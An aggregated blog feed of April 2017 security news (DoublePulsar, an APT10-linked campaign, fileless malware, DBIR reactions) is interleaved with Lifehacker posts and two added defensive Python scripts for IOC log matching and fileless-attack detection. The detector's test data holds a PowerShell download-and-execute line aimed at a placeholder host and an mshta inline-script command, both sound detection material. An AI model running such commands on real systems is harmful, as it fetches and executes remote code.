Sunday, April 30, 2017
Week in review: Lure10 attack, DoublePulsar exploit proliferation
Here’s an overview of some of last week’s most interesting news and articles:
BrickerBot bricked 2 million IoT devices, its author claims
The author of BrickerBot, which “bricks” IoT devices by rewriting the flash storage space and wiping files, has emerged to explain that the malware first attempts to secure the units without damaging them.
Security improvements primary reason for Windows 10 migration
Migration to Windows 10 is expected to be faster than previous OS adoption, according to a survey by Gartner. The survey showed that 85 percent of enterprises will have started Windows 10 deployments by the end of 2017.
Russian carding industry pioneer sentenced to 27 years in prison
Under the nickname “Track2,” Seleznev created two automated vending sites, an innovation that made it possible for criminals to efficiently search for and purchase stolen credit card data through a process as easy as buying a book on Amazon.
Lure10: Exploiting Wi-Fi Sense to MITM wireless Windows devices
Karma has long been a staple man-in-the-middle attack used in authorised wireless security assessments and unsanctioned ones, but as many modern operating systems now provide effective countermeasures, other approaches for tricking wireless clients into automatically associating with a rogue access point are wanted. Enter Lure10 – a new attack that, by taking advantage of Wi-Fi Sense, tricks wireless devices running Windows into doing exactly that.
IT service providers, many other orgs targeted in long-standing attack campaign
According to preliminary analysis, threat actors appear to be leveraging stolen administrative credentials (local and domain) and certificates, along with placing sophisticated malware implants on critical systems.
Industry reactions to the Verizon 2017 Data Breach Investigations Report
Nearly 2,000 breaches were analyzed in this year’s Verizon 2017 Data Breach Investigations Report and more than 300 were espionage-related.
Know your enemy: Defining the new taxonomy of malicious emails
Familiarity can breed contempt, and all users are now at risk from email attacks that have become vastly more sophisticated in the last few years.
Tens of thousands Windows systems implanted with NSA’s DoublePulsar
Has your Windows machine been implanted with NSA’s DoublePulsar backdoor? If you haven’t implemented the security updates released by Microsoft in March (MS17-010), chances are good that it has. The good news is that the implant lives only in memory: rebooting an affected machine removes it, and the updated detection script provided by security firm Countercept can now also uninstall it remotely. Neither step closes the SMB hole it arrived through, so an unpatched machine can simply be re-implanted until the March updates are applied.
How secure are mobile banking apps?
Accenture and NowSecure have performed vulnerability assessments of customer-facing mobile banking apps of 15 banking institutions in the North American market.
Alleged Kelihos botmaster indicted
Pyotr Levashov, who went online under several nicknames – the most memorable of which was “Peter Severa” (i.e. Peter of the North) – was arrested in Barcelona on April 7, 2017, while on vacation with his family.
How to securely deploy medical devices within a healthcare facility
The risks insecure medical devices pose to patient safety are no longer just theoretical, and compromised electronic health records may haunt patients forever.
Will fileless malware push the antivirus industry into oblivion?
The death of antivirus has been prophesied for years now, but the AV industry is still alive and kicking. SentinelOne, though, believes that in-memory resident attacks, i.e. fileless malware, just might be the thing that pushes it into oblivion.
Executive spotlight: iovation’s new Vice President of Product
Last week iovation announced that Dwayne Melancon was leaving Tripwire after 17 years and joining the company as its new Vice President of Product, so we got in touch to ask about his plans.
Behavioural profiling: Spotting the signs of cyber attacks and misuse
Behavioural profiling is increasingly recognised as a new level of protection against cyber attacks and systems abuse, offering the potential to pick out new and unknown attacks, or to spot activities that may be missed.
Cybercrime can come in any shape or size, and not always the form you’d expect
Cyberespionage is now the most common type of attack seen in manufacturing, the public sector and, now, education, warns the Verizon 2017 Data Breach Investigations Report. Much of this is due to the high proliferation of proprietary research, prototypes and confidential personal data, which are hot-ticket items for cybercriminals.
Modern threat landscape: Seismic shifts in motivation and focus
Cybercriminals revealed new levels of ambition in 2016 – a year marked by extraordinary attacks, including multi-million dollar virtual bank heists and overt attempts to disrupt the U.S. electoral process by state-sponsored groups.
Phishing attacks responsible for three-quarters of all malware
While technical attacks on the newest vulnerabilities tend to dominate the media, many attacks rely on less technical means.
SquirrelMail opens users to remote code execution
Users of open source webmail software SquirrelMail are open to remote code execution due to a bug (CVE-2017-7692) discovered independently by two researchers.
New infosec products of the week: April 28, 2017
A rundown of infosec products released last week.
from Help Net Security http://ift.tt/2oME6FA
Saturday, April 29, 2017
Friday, April 28, 2017
Fusion New World Order in the Court: A Dispatch From the Alex Jones Trial | The Concourse Who’s Tired Of All The Winning? | Pictorial 20 Years Ago Ellen DeGeneres Came Out In Front of a Live Studio Audience | The Root I Tried to Read Nbecki’s, I Mean Rachel Dolezal’s, In Full Color so You Didn’t Have to, and I Failed |
from Lifehacker http://ift.tt/2pujGR1
All the Passive Aggressive Stuff You Should Never Do in a Relationship
Nobody enjoys being with someone who is always passive aggressive. If you’re not sure what that looks like, here’s an excellent, and funny, demonstration.
“The key to a great relationship is control...” says the doomed couple in this video from the AwakenWithJP YouTube channel. “Control is the thread that keeps your relationship together, and we found that being passive aggressive is the best way to control your partner.” Obviously, these two are playing for laughs, but the lesson they share is right on the money.
Being passive aggressive is more than just frustrating to the people you care about, it sends mixed signals about how you really feel. If you want to be a good partner and keep things going well, here’s a quick rundown of all the passive aggressive things you should always avoid doing:
- Cold shoulder treatment: Not only is it the worst way to let someone know they did something you didn’t like, it slowly makes people assume they’re just wrong for being who they are.
- Snarky comments: There’s no room for snark or misdirected shaming when you want to show gratitude. It’s not “Thank you for cleaning the kitchen for once,” it’s “Thank you for cleaning the kitchen.”
- Crushing your partners dreams: If your partner is excited about pursuing a goal, don’t cut them down, support them. It’s okay to help keep them grounded so they manage their expectations well, but don’t make yourself another barrier for them to overcome.
- Backhanded compliments: These are always rude, no matter who you’re talking to. Just be supportive and give regular compliments.
- Making your partner feel inept: This is perhaps the worst one of them all. Saying things like “...if you made more money,” “...if you ever took time off for us,” and “...if we had a nicer home” is a recipe for disaster.
There’s no way around it—constant passive aggressive behavior is a type of emotional abuse. To stop it, self awareness is key. When you know what to look for, it’s easier to catch yourself before you say or do things like this.
from Lifehacker http://ift.tt/2qgC3a4
Friday Squid Blogging: Live Squid Washes up on North Carolina Beach
A "mysterious squid" -- big and red -- washed up on a beach in Carteret County, North Carolina. Someone found it, still alive, and set it back in the water after taking some photos of it. Squid scientists later decided it was a diamondback squid.
So, you think that O'Shea might know the identity of the squid Carey Walker found on the Portsmouth Island Beach, just by looking at an emailed photo or two? Indeed, he did. After a couple of days of back-and-forth emails -- it can be difficult to connect consistently with a world-famous man who lives now in Australia -- he reported that, while unusual to be seen on beaches in our parts, this was not a particularly unusual squid: It was a diamondback squid, known in scientific nomenclature as Thysanoteuthis rhombus.
T. rhombus, also known as the diamond squid or diamondback squid, is a large species that grows to about 100 centimeters in length, which translates to about 39 inches, and ranges in weight from 20 to 30 kilograms, which translates to 44 to 50 pounds. Which means that, if nothing else, Carey Walker is pretty good at estimating the weight and length of big red squids he picks up on remote beaches.
As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.
Read my blog posting guidelines here.
from Schneier on Security http://ift.tt/2qggyWZ
Don't Buy Ladybugs to Control Aphids, and Other Gardening Myths Debunked
Ladybugs eat aphids. So if aphids are eating your potato plants, you might be tempted to mail-order a ton of ladybugs (yes, this is a thing you can do) to solve your garden woes. There’s a flaw in that plan, though: when you release ladybugs, they fly away.
I learned the truth about ladybugs, which really should have been obvious from the start, thanks to this video. It’s from Good Gardening Videos, a site run by garden writers and scientists who know which advice is evidence-based and which isn’t. This video tackles four myths, but there’s way more where that came from.
So if the ladybugs fly away, what can you do? The host here suggests you turn your garden into a place where ladybugs will want to live—and when you do that, you won’t need to buy any ladybugs because they’ll move in for free. To create a ladybug paradise, it helps to grow a variety of plants, avoid insecticides, and to let at least some of your aphids live. After all, the ladybugs won’t show up if you’re constantly taking away their food supply.
Watch the video for more, including the truth about adding phosphorus to the soil (it doesn’t help as much as you think, and can hurt) plus two myths about mulching.
from Lifehacker http://ift.tt/2oR1Q6C
Jumping Airgaps with a Laser and a Scanner
Researchers have configured two computers to talk to each other using a laser and a scanner.
Scanners work by detecting reflected light on their glass pane. The light creates a charge that the scanner translates into binary, which gets converted into an image. But scanners are sensitive to any changes of light in a room -- even when paper is on the glass pane or when the light source is infrared -- which changes the charges that get converted to binary. This means signals can be sent through the scanner by flashing light at its glass pane using either a visible light source or an infrared laser that is invisible to human eyes.
There are a couple of caveats to the attack -- the malware to decode the signals has to already be installed on a system on the network, and the lid on the scanner has to be at least partially open to receive the light. It's not unusual for workers to leave scanner lids open after using them, however, and an attacker could also pay a cleaning crew or other worker to leave the lid open at night.
The setup is that there's malware on the computer connected to the scanner, and that computer isn't on the Internet. This technique allows an attacker to communicate with that computer. For extra coolness, the laser can be mounted on a drone.
Here's the paper. And two videos.
from Schneier on Security http://ift.tt/2oFGDBw
Screengrabber Last Night’s Winner Was This Packers Fan At A Bears Draft Party | Jezebel This Oral History of Austin Powers Is the Best Thing I’ve Ever Read | The Root I, a White, Rode the Train With Blacks 1 Day, and It Was Crazy: An Atlanta-Newspaper Reader Writes on Race | Fusion Say Latasha Harlins’ Name |
from Lifehacker http://ift.tt/2qeFIoX
IT service providers, many other orgs targeted in long-standing attack campaign
US-CERT has released an alert warning about a sophisticated attack campaign using multiple malware implants and targeting organizations in the IT, Energy, Healthcare and Public Health, Communications, and Critical Manufacturing sectors.
“According to preliminary analysis, threat actors appear to be leveraging stolen administrative credentials (local and domain) and certificates, along with placing sophisticated malware implants on critical systems,” the alert says.
“Some of the campaign victims have been IT service providers, where credential compromises could potentially be leveraged to access customer environments. Depending on the defensive mitigations in place, the threat actor could possibly gain full access to networks and data in a way that appears legitimate to existing monitoring tools.”
Apparently, the attacks have been going on since May 2016, at least, and they continue. The National Cybersecurity and Communications Integration Center (NCCIC) has, therefore, released indicators of compromise (IOCs) so organizations could check their networks and systems for compromise.
Known malicious domains, fileless malware
The IOC files note that some of the domains used in the attack could be possibly associated with the C&C infrastructure of Stone Panda (aka APT10, aka menuPass). The group is believed to be of Chinese origin, and has apparently been involved in the recent attacks against South Korean targets, as well as espionage efforts against US companies lobbying the Trump administration on global trade, and various organizations in Japan.
“User impersonation via compromised credentials is the primary mechanism used by the adversary. However, a secondary technique to maintain persistence and provide additional access into the victim network is the use of malware implants left behind on key relay and staging machines,” US-CERT also noted.
“In some instances, the malware has only been found within memory with no on-disk evidence available for examination. To date, the actors have deployed multiple malware families and variants, some of which are currently not detected by anti-virus signatures. The observed malware includes PlugX/Sogu and Redleaves.”
IOCs for the PlugX/Sogu and Redleaves malware variants used by the group can also be found in the IOC documents added to the report.
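As an added example (not code from US-CERT, NCCIC or this article), the following Python script shows the kind of check the IOC files are meant to enable: it pulls hostnames out of proxy and DNS log lines and matches them against a domain IOC list on label boundaries, so that look-alike domains that merely contain an indicator as a substring are not reported. The IOC domains, log lines and log formats below are constructed placeholders under the reserved `.invalid` TLD, not indicators from the alert.

```python
"""Match domain IOCs against proxy and DNS log lines.

Added example, not code from US-CERT, NCCIC or Help Net Security. The IOC
domains, log lines and log formats below are constructed placeholders
(all under the reserved .invalid TLD), not indicators from the alert.
"""
import re
from typing import Iterable, List, Optional, Tuple

# Constructed placeholder IOCs (assumption: NOT real indicators).
IOC_DOMAINS = {
    "update.example-c2.invalid",
    "cdn-sync.example-c2.invalid",
    "mail.example-relay.invalid",
}

# Constructed log lines: Squid-style proxy access entries and dnsmasq-style
# query entries (the formats are assumptions; adapt the regex to your own).
SAMPLE_LOGS = [
    "1493380001.123 345 10.0.0.15 TCP_MISS/200 1024 GET http://www.msftncsi.com/ncsi.txt - HIER_DIRECT/1.2.3.4 text/plain",
    "1493380002.456 512 10.0.0.22 TCP_MISS/200 4096 POST https://update.example-c2.invalid/upload - HIER_DIRECT/5.6.7.8 application/octet-stream",
    "Apr 28 10:15:02 dnsmasq[1234]: query[A] edge3.cdn-sync.example-c2.invalid from 10.0.0.31",
    "Apr 28 10:15:03 dnsmasq[1234]: query[A] example-c2.invalid.com from 10.0.0.31",
    "1493380005.789 210 10.0.0.40 TCP_MISS/200 2048 GET http://mail.example-relay.invalid.corp.local/ - HIER_DIRECT/9.9.9.9 text/html",
]

# Anything that looks like a dotted hostname with an alphabetic top-level label.
HOST_RE = re.compile(r"(?i)\b((?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z]{2,63})\b")


def extract_hosts(line: str) -> List[str]:
    """Return lower-cased hostname candidates found in a log line."""
    return [m.group(1).lower().rstrip(".") for m in HOST_RE.finditer(line)]


def matches_ioc(host: str, iocs: Iterable[str]) -> Optional[str]:
    """Return the indicator that `host` equals or is a subdomain of, else None.

    Matching is done on label boundaries: 'example-c2.invalid.com' does NOT
    match 'update.example-c2.invalid', and neither does an internal host that
    merely starts with an indicator.
    """
    for ioc in iocs:
        if host == ioc or host.endswith("." + ioc):
            return ioc
    return None


def scan_logs(lines: Iterable[str], iocs: Iterable[str] = IOC_DOMAINS) -> List[Tuple[int, str, str]]:
    """Return (line number, host, matched indicator) for every hit."""
    hits: List[Tuple[int, str, str]] = []
    for number, line in enumerate(lines, start=1):
        for host in extract_hosts(line):
            ioc = matches_ioc(host, iocs)
            if ioc is not None:
                hits.append((number, host, ioc))
    return hits


if __name__ == "__main__":
    for number, host, ioc in scan_logs(SAMPLE_LOGS):
        print(f"line {number}: {host} matches IOC {ioc}")
```

Two of the constructed lines contain an indicator only as a substring (a `.com` look-alike and an internal host that shares a prefix) and are correctly ignored; the exact match and the subdomain match are reported. Since the alert says credential misuse is the actors’ primary mechanism, a domain hit should be treated as the trigger for a logon and credential review on the source host rather than as the whole hunt.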
“The Redleaves implant consists of three parts: an executable, a loader, and the implant shellcode. The Redleaves implant is a remote administration Trojan (RAT) that is built in Visual C++ and makes heavy use of thread generation during its execution. The implant contains a number of functions typical of RATs, including system enumeration and creating a remote shell back to the C2,” US-CERT explains.
PlugX is a sophisticated Remote Access Tool (RAT) operating since approximately 2012. It is known to use DLL side-loading to evade anti-virus and to maintain persistence on a victim system, and that’s also the case in these campaigns.
NCCIC has provided a comprehensive list of mitigations that should work to keep these intruders out.
from Help Net Security http://ift.tt/2pbjIg0
Stealing Browsing History Using Your Phone's Ambient Light Sensor
There has been a flurry of research into using the various sensors on your phone to steal data in surprising ways. Here's another: using the phone's ambient light sensor to detect what's on the screen. It's a proof of concept, but the paper's general conclusions are correct:
There is a lesson here that designing specifications and systems from a privacy engineering perspective is a complex process: decisions about exposing sensitive APIs to the web without any protections should not be taken lightly. One danger is that specification authors and browser vendors will base decisions on overly general principles and research results which don't apply to a particular new feature (similarly to how protections on gyroscope readings might not be sufficient for light sensor data).
from Schneier on Security http://ift.tt/2oPyN3k
Will fileless malware push the antivirus industry into oblivion?
The death of antivirus has been prophesied for years now, but the AV industry is still alive and kicking. SentinelOne, though, believes that in-memory resident attacks, i.e. fileless malware, just might be the thing that pushes it into oblivion.
They base their conjecture on attack detections made by over a million SentinelOne Endpoint Protection Platform agents deployed in enterprise environments across the world. These detections are made at the endpoint, i.e. they only include the attacks that were not mitigated by other security technologies before reaching the endpoint.
The results show that, from August to November 2016, the threats that come from document-based files (usually MS Word and Adobe PDF) have a pretty steady incidence.
At the same time, the percentage of attacks coming from executable files has been falling, while the rate of successful attacks detected only in system memory has risen.
This latter type of attack may exploit existing operating system resources, and run code or instructions directly from memory, leaving no associated new artefacts on the system.
Characteristics of in-memory resident attacks
“Often the originating object will be cmd.exe, powershell.exe or mshta.exe, as legitimate and essential operating system resources that are subverted as the payload platform during the exploitation stage, instigated frequently either by a document received by email, malicious script or an active code component on a web page,” SentinelOne researchers noted.
“There are many different methods and tools that we detected trying to gain a foothold in memory; WMI persistence is one such tactic. This type of technique was first discovered during the investigation into Stuxnet and later also identified as a method used in the attack on the Democratic National Committee,” they shared.
“Another common attack pattern we see is a ‘live’ or interactive attack, where the attacker delivers a weaponized document and is able to employ a meterpreter reverse shell, powersploit payload or red team testing frameworks. We often see hackers invoke reflective injection techniques to run late stage tools such as mimikatz, to gather credentials on the impacted system. We routinely spot the insertion of javascript into command line instructions and observed an increasing trend in exploits issuing malware payloads in shellcode rather than a file.”
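To make the process-level side of this concrete, here is an added Python example (not SentinelOne’s code or the article’s) that applies the patterns the researchers describe to constructed process-creation records modelled on Sysmon Event ID 1 fields: an Office parent spawning a scripting host, a script host launched by WmiPrvSE.exe (the process under which a WMI event consumer fires), mshta.exe running inline script, and PowerShell -EncodedCommand payloads, which it decodes from base64-wrapped UTF-16LE so the analyst can see what would have run in memory. The event records, the download URL and the field names are assumptions.

```python
"""Flag fileless-style execution chains in process-creation telemetry.

Added example, not SentinelOne's code or the article's. The event records
are constructed to resemble Sysmon Event ID 1 fields (ParentImage, Image,
CommandLine); the download URL and field names are assumptions.
"""
import base64
import re
from typing import Dict, List, Optional

# Document handlers that should rarely spawn a shell or script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
# Built-in interpreters commonly subverted as the payload platform.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "regsvr32.exe", "rundll32.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_FLAGS = sorted({"e", "ec"} | {"encodedcommand"[:i] for i in range(2, 15)}, key=len, reverse=True)
ENC_RE = re.compile(r"(?i)(?<!\S)[-/](?:" + "|".join(_ENC_FLAGS) + r")\s+([A-Za-z0-9+/=]{8,})")
IN_MEMORY_RE = re.compile(r"(?i)\b(iex|invoke-expression|downloadstring|frombase64string)\b")

# Constructed sample payload and events (assumptions, not observed data).
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc "
                    + base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta.exe javascript:close(new ActiveXObject("WScript.Shell").Run("calc.exe"))'},
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -NoP -NonI -c "Get-Date"'},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE) or return None."""
    m = ENC_RE.search(cmdline)
    if m is None:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # restore padding lost to log truncation
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(event: Dict[str, str]) -> List[str]:
    """Return human-readable findings for one process-creation event."""
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    cmdline = event.get("CommandLine", "")
    findings: List[str] = []
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        findings.append(f"document handler spawned script host: {parent} -> {child}")
    if parent == "wmiprvse.exe" and child in SCRIPT_HOSTS:
        findings.append(f"script host launched by WMI provider host (event-consumer persistence?): {child}")
    if child == "mshta.exe" and re.search(r"(?i)\b(javascript|vbscript):", cmdline):
        findings.append("mshta.exe executing inline script from its command line")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded PowerShell decoded: " + decoded)
        if IN_MEMORY_RE.search(decoded):
            findings.append("decoded command fetches or evaluates code in memory")
    return findings


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> findings, for events that produced any."""
    results: Dict[int, List[str]] = {}
    for index, event in enumerate(events):
        findings = assess(event)
        if findings:
            results[index] = findings
    return results


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS).items():
        print(f"event {index}:")
        for finding in findings:
            print("  -", finding)
```

The interactive `cmd.exe /c dir` from Explorer produces nothing, the Word-spawned PowerShell produces three findings (parent-child pair, the decoded payload, and the fact that it downloads and evaluates code without touching disk), and the WmiPrvSE.exe child is flagged on its parent alone, which is the telemetry-side counterpart of enumerating `__EventFilter`, `__EventConsumer` and `__FilterToConsumerBinding` objects in `root\subscription` on the host.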
The rise of the fileless threat
Fileless threats are not a new occurrence, but there has definitely been a rise in attack reports leveraging them.
According to Kaspersky Lab researchers, fileless malware is being used in attacks by both targeted threat actors and cybercriminals in general.
“We have seen such techniques being widely adopted in the last few months. We find examples in the lateral movement tools used in Shamoon attacks, in attacks against Eastern European banks, and used by different APT actors such as CloudComputating, Lungen or HiddenGecko, as well as in the evolution of old backdoors like Hikit, which evolved to new fileless versions,” they noted.
“This trend makes traditional forensic analysis harder, traditional IOCs such as file hashes obsolete, application whitelisting more difficult, and antivirus evasion easier. It also helps to evade most of the log activity.”
SentinelOne also pointed out that the Angler EK now has a fileless option, and Kovter, Phasebot, Powersniff and LatentBot are just some of the recent examples of threats employing in-memory tactics.
And while executable files are still a highly-encountered type of threat, fileless threats should not be discounted, especially as they have an easier time evading traditional and static file inspection dependent security models.
from Help Net Security http://ift.tt/2pagI3s
How to securely deploy medical devices within a healthcare facility
The risks insecure medical devices pose to patient safety are no longer just theoretical, and compromised electronic health records may haunt patients forever.
A surgical robot, pacemaker, or other life critical device being rendered non-functional would give a whole new, and wholly undesirable, meaning to denial of service.
Malware like MEDJACK has been used to infect medical devices and use them as staging grounds to attack medical records systems. IoT ransomware is on the rise and BrickerBot has been rendering IoT devices non-functional. And as medical devices are, at heart, IoT devices, they are subject to all the same risks.
Healthcare organizations need to give consideration to these things during both the acquisition and deployment of medical devices.
They also need to think about setting up perimeter defenses, network and device security controls, interface and central station security, implementing security testing, and about setting up an incident response plan.
OWASP Secure Medical Device Deployment Standard
For those security practitioners that don’t know where to start, the recently published OWASP Secure Medical Device Deployment Standard is a good first read.
Authored by Christopher Frenz, a healthcare information security and privacy expert that specializes in a holistic approach to organizational security, the document provides a set of best practices that organizations can compare their deployments to or base their deployments on.
The project is designed to raise awareness of the various approaches healthcare organizations can take to better secure medical device deployments and in doing so not only better protect patient information, but better protect the patient.
“The OWASP project focuses on the hospital and healthcare provider side of the equation and in that way is complementary to the more manufacturer-focused guidance recently released by the US Food and Drug Administration,” Frenz noted.
“It is also highly complementary to the Hippocratic Oath for Connected Medical Devices put forth by I Am The Cavalry.”
from Help Net Security http://ift.tt/2qdekHX
Industry reactions to the Verizon 2017 Data Breach Investigations Report
Nearly 2,000 breaches were analyzed in this year’s Verizon 2017 Data Breach Investigations Report and more than 300 were espionage-related. Here are some of the comments Help Net Security received on the report.
John Madelin, CEO at Reliance acsn
Today’s report highlights that businesses must rethink their protection strategies to guard against cyber attacks. The fact that 88% of breaches identified in the report fall into patterns first identified in 2014 is an illustration of the need for businesses to identify and properly secure their critical data and assets against attack. The continued success of tried and tested methods deployed by hackers is indicative of senior leaders lacking the knowledge to approach the issue, and instead relying on quick fixes. The truth is, the patchwork of security solutions that are deployed in many organisations are too often ineffective in securing the data at the heart of business today.
This also reflects on the security industry more broadly. Client organisations should be educated on the structure of their data assets, and how to manage their security holistically. The correct technology and process, coupled with effective alerting, alarming and active hunting for threats will set organisations on the right path to avoiding disasters.
It’s high time a structured approach to cybersecurity is deployed across the industry to reduce the damage caused by hackers. Most importantly for business leaders, as well as promising better protection this more focused and integrated approach always results in better economics overall.
Pete Banham, Cyber Resilience Expert at Mimecast
Impersonation fraud and ransomware attacks via email are now the easiest ways for criminals to steal money and valuable data.
Impersonation attacks rarely include a malicious link or attachment, bypassing many traditional security detections. Ransomware is a well-organised threat, with many organisations choosing to pay off hackers quietly to make the threat go away instead of combatting the problem.
The best defence against these types of attack is a layered approach to security, including sandboxing of email attachments, stamping of external email with warnings and on-going employee awareness campaigns.
Fraser Kyne, EMEA CTO at Bromium
What most interested me in this year’s DBIR was that phishing attacks are actually becoming even more prevalent. One in 14 users are being duped into clicking on a bad link or attachment; but even worse, a quarter of those people go on to do it again! There is a phrase that I think is very apt here – “You can’t patch stupidity”.
Essentially, what the DBIR shows us is that you can have the best education, the best processes and the most on-point detection capabilities available, but you will still take a hit. People within the organisation will always find a way around security to get their job done, and clever hackers will always trick end-users into doing something stupid. That’s probably also why we saw such a drastic spike in ransomware in this year’s DBIR; phishing is a great vehicle for hackers to deliver their payload and get ransomware running on a user’s machine. The fact is that however cyber-savvy they are, end-users will always be the weakest link in security.
Organisations therefore need to shift the onus away from controlling user behaviour if they are to get a handle on the situation. The best way of mitigating phishing attacks is to have a safety net in place, allowing end-users to click with freedom, without having to worry too much about stumbling upon a bad link or malicious attachment. Micro-virtualisation is key to this, ensuring that each user task is contained within its own fully isolated and unique virtual environment. As a result, any malicious files are trapped within that virtual machine, posing no risk to the rest of the system. If a user finds themselves opening a malicious email or document, they can simply close down that window, and the threat disappears.
Ilia Kolochenko, CEO at High-Tech Bridge
As in the previous report from 2016, insecure web applications dominate the top attack vectors in almost all the industries. Cybercrime is a [criminal] business, and thus follows the basic rules of business: spend less, get more. Attackers are always looking for the weakest link in your IT infrastructure, before leveraging expensive 0days and complicated APT attacks.
Today, the majority of large organizations and governments can be easily breached via their web and mobile (backend) applications. Emerging risk comes from third-party applications, which are exploited by hackers to compromise your trusted third-party and get access to your data afterwards – cloudization, outsourcing and IT externalization aggravate this complicated challenge.
The report confirms Google’s research, which found a 32% increase in website hacking in 2016. Application security becomes a major problem for organizations and should be addressed as a high priority.
Darren Anstee, CTO at Arbor Networks
Verizon’s Data Breach Investigations Report is an industry gold standard for examining the threat landscape. The fact that it reveals the risk of DDoS attacks has never been higher for industries such as finance, retail and others who are reliant on Internet services and manage large quantities of high value data really emphasises the serious situation facing businesses today.
Organisations in these sectors must invest appropriately to protect themselves and their customers. They can do this by taking the fight to cyber-criminals with improved intelligence sharing and better co-operation with law enforcement. Businesses should also implement layered security, using on premise solutions to deal with targeted attacks and then the cloud to deal with large volumetric attacks. Organisations need to also strengthen their visibility and threat detection capabilities across internal networks so that they have broad and deep visibility of network traffic, threats and user behaviour.
from Help Net Security http://ift.tt/2paiykX
Employees increasingly allowed to move data onto personal mobile devices
Corporate data governance programs are difficult to establish and enforce. For the most part, these programs lack the necessary people, processes and technology to effectively fend off security threats, data breaches, regulatory fines and lawsuits.
The two weakest links in a company’s data governance program are uncontrolled user access to data (53 percent) and managing where data is stored (43 percent), according to a new research study released by Blancco Technology Group.
Data protection and regulatory compliance are further complicated by the fact that organizations are often too lenient in allowing employees to transfer data inside and outside their organizations. For instance, 69 percent of the surveyed IT professionals admitted they allow employees to transfer data onto their personal mobile devices with only minor limitations and 33 percent allow employees to move data to cloud providers, such as Dropbox, without any restrictions at all.
On top of this, 47 percent of organizations either have limited visibility or no visibility at all into how employees move data offsite.
Key findings
Organizations are more concerned with protecting corporate reputations than passing audits and avoiding regulatory penalties. 48 percent of organizations said their biggest concern with data protection regulations is protecting their reputations, while only 38 percent are worried about passing audits and 40 percent are concerned with avoiding penalties.
Unstructured and dark data are growing liabilities for organizations. Despite IDG’s prediction that 93 percent of digital data will be unstructured by 2022, only 41 percent of organizations have a central repository for managing unstructured data. Meanwhile, 34 percent either don’t have any tools in place to manage unstructured data or are in the process of investigating the necessary tools.
Data classification is an important step in laying the foundation for data protection and regulatory compliance. 58 percent classify data according to legal requirements, while 56 percent classify data based on how sensitive it is to unauthorized disclosure/modification and 43 percent classify it according to its perceived value to their organization. However, 5 percent don’t know how data is classified inside their organization, while 13 percent either don’t classify data or don’t know if they do.
The absence and non-enforcement of data removal policies conflicts with EU GDPR’s ‘right to erasure.’ 13 percent of organizations don’t securely erase digital files and folders that are no longer needed or used. On top of this, 16 percent don’t have a data removal policy for when data is no longer needed and 22 percent don’t have written data disposal/destruction policies to handle data that’s no longer needed.
Overall, the study highlights a common, yet unfortunate reality in most enterprises today – what you don’t know can hurt you. One such unknown is the amount of time that data should be retained. In particular, 22 percent of the surveyed IT professionals admitted they keep data forever, while 18 percent said they keep data for a set amount of time regardless of data type.
“The reality is that many organizations adhere to a ‘storage is cheap, keep everything’ mentality,” said Richard Stiennon, Chief Strategy Officer, Blancco Technology Group. “Data hoarding as a practice can be dangerous, as we saw during the Yahoo hack last year when hacker ‘Peace’ leaked four-year-old data from 200 million Yahoo accounts onto the dark web. Organizations need to learn that, as data ages, its usefulness declines. In actual fact, all retained data is a liability for discovery, breach, theft or loss. When its value is less than the liability, when customers demand it (i.e. closing out accounts) and when regulations require it, organizations need to permanently erase the data so it can never be recovered and result in another situation like the Yahoo breach.”
from Help Net Security http://ift.tt/2oRIeAt
Thursday, April 27, 2017
New infosec products of the week: April 28, 2017
Cyberbit EDR uses adaptive behavioral analysis to detect fileless, signature-less attacks
Cyberbit announced a new version of its adaptive Endpoint Detection and Response (EDR) platform, which now provides semi-automated threat hunting, centralized response capabilities, and an improved SDK for detection customization. Originally developed to meet requirements of high-risk organizations, Cyberbit’s new EDR enhancements help customers decrease threat detection and response times while minimizing false positives, improving cyberattack countermeasures and cutting distractions for security teams.
Elcomsoft Cloud eXplorer extracts data from Google accounts
Elcomsoft Cloud eXplorer is a digital forensic tool for remotely acquiring information from Google accounts. Version 1.30 adds the ability to download text messages backed up by Google Pixel smartphones and devices running Android O Developer Preview. In addition, the update improves the handling of enhanced location data, routes and places. The ability to process users’ routes and places improves readability of location data, providing experts a concise list of places instead of numerical geolocation coordinates.
Gigamon delivers visibility for securing 40Gb and 100Gb networks
Gigamon announced the release of the GigaVUE-HC3, a high-performance appliance to enable pervasive visibility and security intelligence at scale in 10Gb, 40Gb and 100Gb networks. The new offering extends the Visibility Platform and GigaSMART technologies with higher compute and throughput performance to manage, secure and analyze high volumes of data in transit across networks.
Inside Secure releases latest true random number generator
